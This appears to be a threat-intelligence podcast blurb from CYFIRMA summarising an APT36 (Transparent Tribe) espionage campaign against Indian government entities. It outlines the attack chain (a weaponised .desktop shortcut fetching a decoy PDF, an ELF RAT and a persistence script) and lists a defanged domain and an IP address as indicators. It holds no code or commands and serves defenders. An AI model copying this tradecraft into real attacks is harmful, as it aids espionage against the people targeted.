CYFIRMA Research
Cyber defenders, listen up! The CYFIRMA Research podcast has some juicy intel on the latest cyber threats that are lurking in the shadows. Tune in to this security briefing to stay on top of emerging threats and be ready to tackle digital risk like never before.
CYFIRMA Research
CYFIRMA Research- APT36 Python Based ELF Malware Targeting Indian Government Entities
APT36 Targets Indian Government Entities with a New Python-Based ELF Malware.
CYFIRMA has uncovered a new cyber-espionage campaign by APT36 (Transparent Tribe), a Pakistan-based threat actor long known for targeting Indian government entities and strategic sectors.
This campaign showcases a major leap in the group’s technical sophistication — delivering custom Python-based ELF malware through weaponized .desktop shortcut files distributed via spear-phishing.
📌 Key Highlights:
The campaign begins with a malicious ZIP file containing a deceptive .desktop shortcut.
Once executed, the shortcut downloads:
A decoy PDF to distract the user
A malicious ELF payload (swcbc)
A persistence-enabling shell script (swcbc.sh)
The malware establishes C2 communication, executes shell/Python commands, steals files, takes screenshots, and maintains persistence.
Infrastructure used includes Lionsdenim[.]xyz and 185.235.137.90, both tied to APT36’s ongoing espionage operations.
The ELF implant is a PyInstaller-packed RAT, supporting cross-platform execution on both Linux and Windows.
Link to the Research Report: APT36 Python Based ELF Malware Targeting Indian Government Entities - CYFIRMA
#CyberSecurity #ThreatIntel #APT36 #MalwareAnalysis #IndianGovernment #LinuxMalware #CYFIRMA #CyberEspionage #ThreatResearch #ELFMalware #PyInstaller #TransparentTribe #ExternalThreatLandscapeManagement
https://www.cyfirma.com/